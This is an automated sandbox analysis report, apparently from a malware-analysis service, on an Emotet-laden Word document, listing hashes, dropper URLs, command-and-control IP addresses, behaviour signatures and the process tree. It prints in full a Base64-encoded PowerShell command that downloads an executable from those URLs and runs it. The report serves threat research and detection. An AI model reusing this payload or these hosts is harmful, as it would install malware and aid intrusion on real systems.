Analysis

  • max time kernel
    83s
  • max time network
    88s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 14:52

General

  • Target

    emotet_e1_b9c07b0add0ebfdfb953f12ca052352e83f960649b3e3b260bd55cd93c9252bc_2020-07-31__145240._doc.doc

  • Size

    169KB

  • MD5

    57ec1605b534e2381fceb0eef1b58578

  • SHA1

    651f7ea8ccf287459494772072ffe935ba36d78a

  • SHA256

    b9c07b0add0ebfdfb953f12ca052352e83f960649b3e3b260bd55cd93c9252bc

  • SHA512

    e3bd0cefce713f666a4441d882ba7170b7d51322611b54cc40a2b32751ecc3189957f961c06d91f86e6313815b42eca96b7d711fabcca0125ed18743dc2f7574

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mc-interiorismo.com/theme/Rk/

exe.dropper

http://mc130.com/SHB/KloCHjT/

exe.dropper

http://mentarimedia.com/modules/p6N365/

exe.dropper

http://mellysphotography.com/large/Rem220541/

exe.dropper

http://vipmein.com/assets2/6eeP7BwazY/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_b9c07b0add0ebfdfb953f12ca052352e83f960649b3e3b260bd55cd93c9252bc_2020-07-31__145240._doc.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    PID:112
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABPAFYASQBGAFQAagBjAGQAPQAnAFgAUgBBAEMAUQBiAG8AawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAcgBgAGkAVABgAFkAUAByAGAAbwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFUAWgBHAFAAVQBjAG0AaQAgAD0AIAAnADYANAAxACcAOwAkAE4AUwBHAFMATABwAHoAZAA9ACcAQwBWAFAASwBXAHQAcwBoACcAOwAkAE4ARwBSAEQAUQBwAHQAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBaAEcAUABVAGMAbQBpACsAJwAuAGUAeABlACcAOwAkAEkATQBIAEIATgBrAHcAegA9ACcAUwBKAEUAQQBKAG0AegB2ACcAOwAkAFAARgBUAFgARgBpAHkAdwA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAGUAYgBDAEwAaQBlAG4AdAA7ACQAUQBKAFYATABEAG0AdQBkAD0AJwBoAHQAdABwADoALwAvAG0AYwAtAGkAbgB0AGUAcgBpAG8AcgBpAHMAbQBvAC4AYwBvAG0ALwB0AGgAZQBtAGUALwBSAGsALwAqAGgAdAB0AHAAOgAvAC8AbQBjADEAMwAwAC4AYwBvAG0ALwBTAEgAQgAvAEsAbABvAEMASABqAFQALwAqAGgAdAB0AHAAOgAvAC8AbQBlAG4AdABhAHIAaQBtAGUAZABpAGEALgBjAG8AbQAvAG0AbwBkAHUAbABlAHMALwBwADYATgAzADYANQAvACoAaAB0AHQAcAA6AC8ALwBtAGUAbABsAHkAcwBwAGgAbwB0AG8AZwByAGEAcABoAHkALgBjAG8AbQAvAGwAYQByAGcAZQAvAFIAZQBtADIAMgAwADUANAAxAC8AKgBoAHQAdABwADoALwAvAHYAaQBwAG0AZQBpAG4ALgBjAG8AbQAvAGEAcwBzAGUAdABzADIALwA2AGUAZQBQADcAQgB3AGEAegBZAC8AJwAuACIAUwBwAGAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAEQAWABQAFQAZwBoAGEAPQAnAEgARwBFAEkAWQB1AGUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBQAFMAWABFAHIAZwBkACAAaQBuACAAJABRAEoAVgBMAEQAbQB1AGQAKQB7AHQAcgB5AHsAJABQAEYAVABYAEYAaQB5AHcALgAiAGQAbwB3AE4AbABvAEEAYABkAGYASQBgAEwAZQAiACgAJABTAFAAUwBYAEUAcgBnAGQALAAgACQATgBHAFIARABRAHAAdAByACkAOwAkAEYATQBGAFYAVgBsAHQAaAA9ACcAUABDAEwARABMAGEAbwBrACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQATgBHAFIARABRAHAAdAByACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAyADcANAA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBgAEUAQQBUAEUAIgAoACQATgBHAFIARABRAHAAdAByACkAOwAkAFMAUwBCAFQATQBhAG8AdAA9ACcASgBMAEoAVwBHAGgAdABqACcAOwBiAHIAZQBhAGsAOwAkAE0ASABMAFcATQBsAHIAeQA9ACcARABWAEQAVQBOAHEAcQBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAUwBUAFUASABzAGIAeAA9ACcARwBGAEYAVgBTAHIAbwB4ACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    PID:1744
  • C:\Users\Admin\641.exe
    C:\Users\Admin\641.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1820
    • C:\Windows\SysWOW64\neth\msvcp60.exe
      "C:\Windows\SysWOW64\neth\msvcp60.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1560

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/112-2-0x0000000008B20000-0x0000000008B24000-memory.dmp

    Filesize

    16KB

  • memory/112-6-0x000000000AB80000-0x000000000AB84000-memory.dmp

    Filesize

    16KB

  • memory/112-7-0x000000000BC00000-0x000000000BC04000-memory.dmp

    Filesize

    16KB

  • memory/1560-14-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/1820-11-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB